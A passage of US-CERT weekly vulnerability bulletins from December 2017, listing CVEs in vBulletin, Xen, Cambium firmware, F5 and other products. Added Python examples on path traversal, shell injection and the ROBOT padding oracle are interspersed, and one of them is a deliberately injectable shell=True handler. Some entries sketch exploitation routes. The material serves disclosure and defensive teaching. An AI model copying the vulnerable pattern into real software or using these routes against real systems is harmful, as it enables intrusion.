default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17533
Source & Patch Info: MISC

trend_micro -- encryption_for_mail
A service DLL preloading vulnerability in Trend Micro Encryption for Email versions 5.6 and below could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-11397
Source & Patch Info: MISC, CONFIRM

trend_micro -- scanmail_for_exchange
The Log Query and Quarantine Query pages in Trend Micro ScanMail for Exchange 12.0 are vulnerable to cross site scripting (XSS) attacks.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-14093
Source & Patch Info: CONFIRM, MISC

trend_micro -- scanmail_for_exchange
The absence of Anti-CSRF tokens in Trend Micro ScanMail for Exchange 12.0 web interface forms could allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-14092
Source & Patch Info: CONFIRM, MISC

trend_micro -- scanmail_for_exchange
A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which some communications to the update servers are not encrypted.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-14090
Source & Patch Info: CONFIRM, MISC

trend_micro -- scanmail_for_exchange
A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which certain specific installations that utilize an uncommon feature - Other Update Sources - could be exploited to overwrite sensitive files in the ScanMail for Exchange directory.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-14091
Source & Patch Info: CONFIRM, MISC

vbulletin -- vbulletin
vBulletin through 5.3.x on Windows allows remote PHP code execution because a require_once call is reachable with an unauthenticated request that can include directory traversal sequences to specify an arbitrary pathname, and because ../ traversal is blocked but ..\ traversal is not blocked. For example, an attacker can make an invalid HTTP request containing PHP code, and then make an index.php?routestring= request with enough instances of ".." to reach an Apache HTTP Server log file.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17671
Source & Patch Info: MISC

vbulletin -- vbulletin
In vBulletin through 5.3.x, there is an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution, because of unsafe usage of PHP's unserialize() in vB_Library_Template's cacheTemplates() function, which is a publicly exposed API. This is exploited with the templateidlist parameter to ajax/api/template/cacheTemplates.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17672
Source & Patch Info: MISC

videolan -- vlc_media_player
In VideoLAN VLC media player through 2.2.8, there is a type conversion vulnerability in modules/demux/mp4/libmp4.c in the MP4 demux module leading to an invalid free, because the type of a box may be changed between a read operation and a free operation.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17670
Source & Patch Info: MISC

vmware -- airwatch_console
VMware AirWatch Console (AWC) contains a Broken Access Control vulnerability. Successful exploitation of this issue could result in end-user device details being disclosed to an unauthorized administrator.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-4942
Source & Patch Info: BID, SECTRACK, CONFIRM

vmware -- vasa_provider
Versions of VASA Provider for Clustered Data ONTAP prior to 7.0P1 contain a web server that accepts plain text authentication. This could allow an unauthenticated attacker to obtain authentication credentials.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2016-6904
Source & Patch Info: CONFIRM

western_digital -- mycloud_pr4100_2.30.172_devices
An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-17560
Source & Patch Info: MISC, MISC

white_dune -- white_dune
swt/motif/browser.c in White_dune (aka whitedune) 0.30.10 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17518
Source & Patch Info: MISC

wolfssl -- wolfssl
wolfSSL prior to version 3.12.2 provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable wolfSSL application. This vulnerability is referred to as "ROBOT."
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-13099
Source & Patch Info: CERT-VN, BID, CONFIRM, MISC

xen -- xen
An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging an incorrect mask for reference-count overflow checking in shadow mode.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-17563
Source & Patch Info: CONFIRM, CONFIRM

xen -- xen
An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) if shadow mode and log-dirty mode are in place, because of an incorrect assertion related to M2P.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-17565
Source & Patch Info: CONFIRM, CONFIRM

xen -- xen
An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) or gain host OS privileges in shadow mode by mapping a certain auxiliary page.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-17566
Source & Patch Info: CONFIRM, CONFIRM

xen -- xen
An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging incorrect error handling for reference counting in shadow mode.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-17564
Source & Patch Info: CONFIRM, CONFIRM

xtuple_postbooks -- xtuple_postbooks
guiclient/guiclient.cpp in xTuple PostBooks 4.7.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17525
Source & Patch Info: MISC

yourphpscript.com -- simple_chatting_system
Simple Chatting System 1.0 allows Arbitrary File Upload via view/my_profile.php, which places files under uploads/.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17593
Source & Patch Info: MISC

zoho -- manageengine_password_manager_pro_9
Zoho ManageEngine Password Manager Pro 9 before 9.4 (9400) has reflected XSS in SearchResult.ec and BulkAccessControlView.ec.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17698
Source & Patch Info: CONFIRM

North Korean Malicious Cyber Activity

Original release date: December 21, 2017

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have identified Trojan malware variants—referred to as BANKSHOT—used by the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.

US-CERT encourages users and administrators to review Malware Analysis Report (MAR) 10135536-B and the US-CERT page on HIDDEN COBRA - North Korean Malicious Cyber Activity for more information.



SB17-359: Vulnerability Summary for the Week of December 18, 2017

Original release date: December 25, 2017 | Last revised: December 26, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

High Vulnerabilities

Fields: Primary Vendor -- Product; Description; Published; CVSS Score; Source & Patch Info

k7computing -- antivirus
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025ac DeviceIoControl request.
Published: 2017-12-15 | CVSS Score: 7.5 | CVE-2017-17699
Source & Patch Info: MISC

k7computing -- antivirus
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025a4 DeviceIoControl request.
Published: 2017-12-15 | CVSS Score: 7.5 | CVE-2017-17700
Source & Patch Info: MISC

k7computing -- antivirus
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025c8 DeviceIoControl request.
Published: 2017-12-15 | CVSS Score: 7.5 | CVE-2017-17701
Source & Patch Info: MISC

Medium Vulnerabilities

Fields: Primary Vendor -- Product; Description; Published; CVSS Score; Source & Patch Info

techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 does not check authorization for panel/portfolio.php?action=delete requests that remove feedback.
Published: 2017-12-15 | CVSS Score: 4.0 | CVE-2017-17693
Source & Patch Info: MISC

techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows SQL Injection via the panel/search.php s parameter.
Published: 2017-12-15 | CVSS Score: 6.5 | CVE-2017-17695
Source & Patch Info: MISC

techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows full path disclosure via an invalid s parameter to panel/search.php.
Published: 2017-12-15 | CVSS Score: 4.0 | CVE-2017-17696
Source & Patch Info: MISC

Low Vulnerabilities

Fields: Primary Vendor -- Product; Description; Published; CVSS Score; Source & Patch Info

techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows XSS via the panel/search.php s parameter.
Published: 2017-12-15 | CVSS Score: 3.5 | CVE-2017-17694
Source & Patch Info: MISC

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
abb -- ellipse
 
An Unprotected Transport of Credentials issue was discovered in ABB Ellipse 8.3 through Ellipse 8.9 released prior to December 2017 (including Ellipse Select). A vulnerability exists in the authentication of Ellipse to LDAP/AD using the LDAP protocol. An attacker could exploit the vulnerability by sniffing local network traffic, allowing the discovery of authentication credentials.2017-12-20not yet calculatedCVE-2017-16731
MISC
apache -- drill
 
In Apache Drill 1.11.0 and earlier when submitting form from Query page users are able to pass arbitrary script or HTML which will take effect on Profile page afterwards. Example: after submitting special script that returns cookie information from Query page, malicious user may obtain this information from Profile page afterwards.2017-12-18not yet calculatedCVE-2017-12630
MLIST
apache -- sling_authentication_service
 
A flaw in the org.apache.sling.auth.core.AuthUtil#isRedirectValid method in Apache Sling Authentication Service 1.4.0 allows an attacker, through the Sling login form, to trick a victim to send over their credentials.2017-12-18not yet calculatedCVE-2017-15700
MLIST
bitdefender -- bitdefender
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender Internet Security 2018. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within emulator 0x102 in cevakrnl.xmd. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Was ZDI-CAN-5116.2017-12-21not yet calculatedCVE-2017-17410
MISC
bitdefender -- bitdefender
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender Internet Security 2018. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within emulator 0x10A in cevakrnl.xmd. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before writing to memory. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Was ZDI-CAN-5102.2017-12-21not yet calculatedCVE-2017-17409
MISC
bitdefender -- bitdefender
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender Internet Security 2018. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within cevakrnl.xmd. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Was ZDI-CAN-5101.2017-12-21not yet calculatedCVE-2017-17408
MISC
blogotext -- blogotext
 
validate_form_preferences in admin/preferences.php in BlogoText through 3.7.6 allows attackers to bypass intended access restrictions via vectors related to an e-mail address field.2017-12-20not yet calculatedCVE-2017-17794
CONFIRM
CONFIRM
blogotext -- blogotext
 
Cross site scripting (XSS) vulnerability in the markup_clean_href function in inc/conv.php in BlogoText through 3.7.6 allows remote attackers to inject arbitrary JavaScript via a comment.2017-12-20not yet calculatedCVE-2017-17792
CONFIRM
CONFIRM
blogotext -- blogotext
 
Information Disclosure vulnerability in creer_fichier_zip in admin/maintenance.php in BlogoText through 3.7.6 allows remote attackers to defeat a filename-randomization protection mechanism, and read backup archives on Windows servers, by providing the archiv~1.zip name (aka an 8.3 filename).2017-12-20not yet calculatedCVE-2017-17793
CONFIRM
CONFIRM
brightsign -- brightsign_digital_signage
 
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has XSS via the REF parameter to /network_diagnostics.html or /storage_info.html.2017-12-18not yet calculatedCVE-2017-17737
MISC
brightsign -- brightsign_digital_signage
 
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) allows renaming and modifying files via /tools.html.2017-12-18not yet calculatedCVE-2017-17738
MISC
brightsign -- brightsign_digital_signage
 
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has directory traversal via the /storage.html rp parameter, allowing an attacker to read or write to files.2017-12-18not yet calculatedCVE-2017-17739
MISC
cambium_networks -- epmp_firmware
 
Versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware lack CSRF controls that can mitigate the effects of CSRF attacks, which are most typically implemented as randomized per-session tokens associated with any web application function, especially destructive ones.2017-12-20not yet calculatedCVE-2017-5263
MISC
cambium_networks -- epmp_firmware
In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows (or guesses) the SNMP read/write (RW) community string can insert XSS strings in certain SNMP OIDs which will execute in the context of the currently-logged on user.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5257
Source & Patch Info: MISC

cambium_networks -- epmp_firmware
In version 3.5 and prior of Cambium Networks ePMP firmware, all authenticated users have the ability to update the Device Name and System Description fields in the web administration console, and those fields are vulnerable to persistent cross-site scripting (XSS) injection.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5256
Source & Patch Info: MISC

cambium_networks -- epmp_firmware
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the 'ping' and 'traceroute' functions of the web administrative console expose a file path traversal vulnerability, accessible to all authenticated users.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5261
Source & Patch Info: MISC

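The BrightSign /storage.html `rp` entry and the cnPilot ping/traceroute entry describe the same class of bug: a client-supplied path is joined to a base directory without confining the result. The following added example, which is not from either vendor or from the bulletin, shows a resolver that canonicalizes the joined path and refuses anything that leaves the base, including escapes through a symlink that contain no `..` at all. The base directory names and sample paths are made up for illustration.

```python
import os
import posixpath
import tempfile


class TraversalError(ValueError):
    """Raised when a client-supplied path would leave the base directory."""


def resolve_under(base_dir, user_path):
    """Resolve a client-supplied relative path strictly inside base_dir.

    Rejects NUL bytes, absolute paths, '..' sequences that escape the base and
    symlink escapes (realpath follows links before the containment check).
    Returns the canonical absolute path on success. Decode URL-encoding exactly
    once, in the web layer, before calling this.
    """
    if "\x00" in user_path:
        raise TraversalError("NUL byte in path")
    if posixpath.isabs(user_path) or os.path.isabs(user_path):
        raise TraversalError("absolute path not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath is the correct containment test: a naive
    # candidate.startswith(base) would accept '/srv/storage_evil' for
    # base '/srv/storage'.
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(f"path escapes {base}: {user_path!r}")
    return candidate


def is_safe(base_dir, user_path):
    """Convenience wrapper: True if resolve_under() accepts the path."""
    try:
        resolve_under(base_dir, user_path)
        return True
    except TraversalError:
        return False


def demo_symlink_escape():
    """Build base/ and a sibling outside/secret, add base/link -> outside, and
    ask whether 'link/secret' (no '..' anywhere) is accepted. Returns the
    is_safe() verdict, or None if symlinks cannot be created here."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "base")
        outside = os.path.join(tmp, "outside")
        os.makedirs(base)
        os.makedirs(outside)
        with open(os.path.join(outside, "secret"), "w") as fh:
            fh.write("not for the web\n")
        try:
            os.symlink(outside, os.path.join(base, "link"))
        except OSError:
            return None
        return is_safe(base, "link/secret")
```

A lexical `..` filter alone is not enough: the symlink case passes such a filter, and so does an absolute path or an encoded variant the web server has already decoded. Canonicalize first, then test containment.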
cambium_networks -- epmp_firmware
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the SNMP read-only (RO) community string has access to sensitive information by OID reference.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5262
Source & Patch Info: MISC

cambium_networks -- epmp_firmware
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, although the option to access the configuration file is not available in the normal web administrative console for the 'user' account, the configuration file is accessible via a direct object reference (IDOR) at http://<device-ip-or-hostname>/goform/down_cfg_file by this otherwise low-privilege 'user' account.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5260
Source & Patch Info: MISC

cambium_networks -- epmp_firmware
In version 3.5 and prior of Cambium Networks ePMP firmware, a lack of input sanitization for certain parameters on the web management console allows any authenticated user (including the otherwise low-privilege readonly user) to inject shell metacharacters as part of a specially-crafted POST request to the get_chart function and run OS-level commands, effectively as root.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5255
Source & Patch Info: MISC

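The ePMP `get_chart` entry is a textbook shell-metacharacter injection. The example below is added here and is not Cambium's code: `echo chart <interface>` is a hypothetical stand-in for whatever tool the real handler invokes, and the `interface` parameter name is an assumption. It shows the vulnerable shape (parameter spliced into a `shell=True` command string), the weaker fix (`shlex.quote`, still a shell), and the preferred fix (allowlist validation plus an argv list with no shell at all).

```python
import re
import shlex
import subprocess

# Allowlist for the one parameter this handler accepts: a plausible interface
# name, nothing else. Anything that fails this never reaches a process.
INTERFACE_RE = re.compile(r"^[a-z][a-z0-9.-]{0,15}$")


def get_chart_vulnerable(interface):
    """Vulnerable shape: the request parameter is interpolated into a command
    line that /bin/sh parses, so ';', '|', '&&', '$(...)' and backticks in the
    value become additional commands. Returns the combined stdout."""
    cmd = f"echo chart {interface}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def get_chart_quoted(interface):
    """Partial fix: shlex.quote() turns the value into a single shell word, so
    the metacharacters are passed through as data. Still shell-dependent, and
    does nothing about option injection (a value such as '-n')."""
    cmd = f"echo chart {shlex.quote(interface)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def get_chart_hardened(interface):
    """Preferred fix: validate against the allowlist, then execute an argv list
    with no shell, so the value can only ever be one argument of one program.
    Raises ValueError for anything outside the allowlist."""
    if not INTERFACE_RE.fullmatch(interface):
        raise ValueError(f"invalid interface name: {interface!r}")
    result = subprocess.run(
        ["echo", "chart", interface], capture_output=True, text=True, check=True
    )
    return result.stdout
```

The "effectively as root" part of the entry is a separate defect: even with the injection fixed, a web handler that spawns diagnostics should run them under a dedicated low-privilege account so that a future bug in the same path is not a root compromise.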
cambium_networks -- epmp_firmware
In version 3.5 and prior of Cambium Networks ePMP firmware, the non-administrative users 'installer' and 'home' have the capability of changing passwords for other accounts, including admin, after disabling a client-side protection mechanism.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5254
Source & Patch Info: MISC

cambium_networks -- epmp_firmware
In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows or can guess the RW community string can provide a URL for a configuration file over SNMP with XSS strings in certain SNMP OIDs, serve it via HTTP, and the affected device will perform a configuration restore using the attacker's supplied config file, including the inserted XSS strings.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5258
Source & Patch Info: MISC

cambium_networks -- epmp_firmware
In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https://<device-ip-or-hostname>/adm/syscmd.asp.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-5259
Source & Patch Info: MISC

cisco -- asa
A vulnerability in the TLS protocol implementation of legacy Cisco ASA 5500 Series (ASA 5505, 5510, 5520, 5540, and 5550) devices could allow an unauthenticated, remote attacker to access sensitive information, aka a Return of Bleichenbacher's Oracle Threat (ROBOT) attack. An attacker could iteratively query a server running a vulnerable TLS stack implementation to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions. Cisco Bug IDs: CSCvg97652.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-12373
Source & Patch Info: BID, CONFIRM

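The ASA entry names ROBOT without describing the mechanism. What the attacker needs is any server behaviour that distinguishes a ciphertext whose RSA decryption is a PKCS#1 v1.5-conforming block from one that is not; each such answer narrows the interval containing the plaintext, and enough of them recover the premaster secret of a recorded RSA key exchange. The following added example (not Cisco's code and not from the bulletin) implements the conformance check from RFC 8017 section 7.2.2 on an already-decrypted block, with the RSA operation itself omitted, and contrasts the leaky handling with the RFC 5246 section 7.4.7.1 handling that substitutes a random premaster secret on any failure. The block length `k`, the client version and the sample premaster secret are constructed. Python cannot be made constant-time; the point shown is the absence of a distinguishable error path, not timing.

```python
import os

PMS_LEN = 48  # TLS premaster secret: 2 version bytes + 46 random bytes


def pkcs1_v15_pad(msg, k):
    """Build a PKCS#1 v1.5 type-2 block of length k: 00 02 PS 00 msg, where PS is
    at least 8 nonzero random bytes. Only used here to construct test input."""
    ps_len = k - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for block length")
    ps = bytearray()
    while len(ps) < ps_len:
        ps.extend(b for b in os.urandom(ps_len) if b != 0)
    return b"\x00\x02" + bytes(ps[:ps_len]) + b"\x00" + msg


def pkcs1_v15_unpad(em, k):
    """Return the payload if em is a conforming type-2 block of length k, else
    None. Non-conforming: wrong length, leading bytes not 00 02, fewer than 8
    padding bytes before the separator, or no 00 separator at all."""
    if len(em) != k or em[0] != 0x00 or em[1] != 0x02:
        return None
    sep = em.find(b"\x00", 2)
    if sep == -1 or sep < 10:  # bytes 2..9 must be padding, so sep >= 10
        return None
    return em[sep + 1:]


def tls_premaster_oracle(em, k, client_version):
    """VULNERABLE handling. A padding failure takes a different path (here an
    exception; on a real stack a distinct alert, message or timing) from a
    success. That difference is the oracle Bleichenbacher/ROBOT queries."""
    pms = pkcs1_v15_unpad(em, k)
    if pms is None:
        raise ValueError("decrypt_error: bad PKCS#1 padding")
    if len(pms) != PMS_LEN or pms[:2] != client_version:
        raise ValueError("decrypt_error: bad premaster length or version")
    return pms


def tls_premaster_rfc5246(em, k, client_version):
    """Mitigated handling per RFC 5246 7.4.7.1: always yield a 48-byte
    premaster secret. On any failure (bad padding, wrong length, version
    mismatch) substitute random bytes R generated before the check, so the
    handshake fails later at Finished exactly as a wrong guess would."""
    r = os.urandom(PMS_LEN)
    pms = pkcs1_v15_unpad(em, k)
    if pms is None or len(pms) != PMS_LEN:
        return r
    if pms[:2] != client_version:
        return r
    return pms
```

The fix removes the information, not the decryption failure: the client still cannot finish the handshake, but the attacker can no longer tell a padding failure from a version mismatch or from a correctly padded block with the wrong secret.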
cms_made_simple -- cms_made_simple
CMS Made Simple (CMSMS) before 2.2.5 does not properly cache login information in cookies.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17735
Source & Patch Info: CONFIRM, CONFIRM

cms_made_simple -- cms_made_simple
CMS Made Simple (CMSMS) before 2.2.5 does not properly cache login information in sessions.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17734
Source & Patch Info: CONFIRM, CONFIRM

code_crafters -- ability_mail_server
Ability Mail Server 3.3.2 has Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). This is fixed in version 4.2.4.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17752
Source & Patch Info: EXPLOIT-DB

conarc -- ichannel
Conarc iChannel allows remote attackers to obtain sensitive information, modify the configuration, or cause a denial of service (by deleting the configuration) via a wc.dll?wwMaint~EditConfig request (which reaches an older version of a West Wind Web Connection HTTP service).
Published: 2017-12-19 | CVSS Score: not yet calculated | CVE-2017-17759
Source & Patch Info: MISC

dedecms -- dedecms
DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17731
Source & Patch Info: MISC

dedecms -- dedecms
DedeCMS through 5.6 allows arbitrary file upload and PHP code execution by embedding the PHP code in a .jpg file, which is used in the templet parameter to member/article_edit.php.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17727
Source & Patch Info: MISC

dedecms -- dedecms
DedeCMS through 5.7 has SQL Injection via the logo parameter to plus/flink_add.php.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17730
Source & Patch Info: MISC

ecava -- integraxor
A SQL injection issue was discovered in Ecava IntegraXor v6.1.1030.1 and prior; exploiting it generates an error in the database log.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16735
Source & Patch Info: MISC

ecava -- integraxor
A SQL injection issue was discovered in Ecava IntegraXor v6.1.1030.1 and prior; an attacker can leverage it to disclose sensitive information from the database.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16733
Source & Patch Info: MISC

emc -- data_domain
An issue was discovered in EMC Data Domain DD OS 5.7 family, versions prior to 5.7.5.6; EMC Data Domain DD OS 6.0 family, versions prior to 6.0.2.9; EMC Data Domain DD OS 6.1 family, versions prior to 6.1.0.21; EMC Data Domain Virtual Edition 2.0 family, all versions; EMC Data Domain Virtual Edition 3.0 family, versions prior to 3.0 SP2 Update 1; and EMC Data Domain Virtual Edition 3.1 family, versions prior to 3.1 Update 2. EMC Data Domain DD OS contains a memory overflow vulnerability in SMBv1 which may potentially be exploited by an unauthenticated remote attacker. An attacker may completely shut down both the SMB service and Active Directory authentication. This may also allow remote code injection and execution.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14385
Source & Patch Info: CONFIRM, SECTRACK

emc -- isilon_onefs
The NFS service in EMC Isilon OneFS 8.1.0.0, 8.0.1.0 - 8.0.1.1, and 8.0.0.0 - 8.0.0.4 maintains default NFS export settings (including the NFS export security flavor for authentication) that can be leveraged by current and future NFS exports. This NFS service contained a flaw that did not properly propagate changes made to the default security flavor to all new and existing NFS exports that are configured to use default NFS export settings and that are mounted after those changes are made. This flaw may potentially allow NFS clients to access affected NFS exports using the default and potentially weaker security flavor even if a more secure one was selected to be used by the OneFS administrator, aka an "NFS Export Security Setting Fallback Vulnerability."
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14387
Source & Patch Info: CONFIRM

f5 -- big-ip_afm
A SQL injection vulnerability exists in the BIG-IP AFM management UI on versions 12.0.0, 12.1.0, 12.1.1, 12.1.2 and 13.0.0 that may allow a copy of the firewall rules to be tampered with and impact the Configuration Utility until there is a resync of the rules. Traffic processing and the live firewall rules in use are not affected.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-0304
Source & Patch Info: SECTRACK, CONFIRM

f5 -- big-ip_apm
In F5 BIG-IP APM software version 13.0.0 and 12.1.2, in some circumstances, APM tunneled VPN flows can cause a VPN/PPP connflow to be prematurely freed or cause TMM to stop responding with a "flow not in use" assertion. An attacker may be able to disrupt traffic or cause the BIG-IP system to fail over to another device in the device group.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6129
Source & Patch Info: CONFIRM

f5 -- big-ip_apm
In F5 BIG-IP APM software versions 11.5.0, 11.5.1, 11.5.2, 11.5.3, 11.5.4, 11.6.0, 11.6.1, 12.0.0, 12.1.0, 12.1.1 and 12.1.2, BIG-IP APM portal access requests do not return the intended resources in some cases. This may allow access to internal BIG-IP APM resources; however, the application resources and backend servers are unaffected.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-0301
Source & Patch Info: SECTRACK, CONFIRM

f5 -- big-ip_apm
In F5 BIG-IP APM software version 13.0.0 and 12.1.2, under rare conditions, the BIG-IP APM system appends log details when responding to client requests. Details in the log file can vary; customers running debug mode logging with BIG-IP APM are at highest risk.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6139
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator and WebSafe software version 13.0.0, undisclosed requests made to BIG-IP virtual servers which make use of the "HTTP/2 profile" may result in a disruption of service to TMM.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6151
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0, a slow memory leak as a result of undisclosed IPv4 or IPv6 packets sent to BIG-IP management port or self IP addresses may lead to out of memory (OOM) conditions.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6135
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0, 12.1.0 - 12.1.2 and 11.5.1 - 11.6.1, an undisclosed sequence of packets, sourced from an adjacent network, may cause TMM to crash.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6134
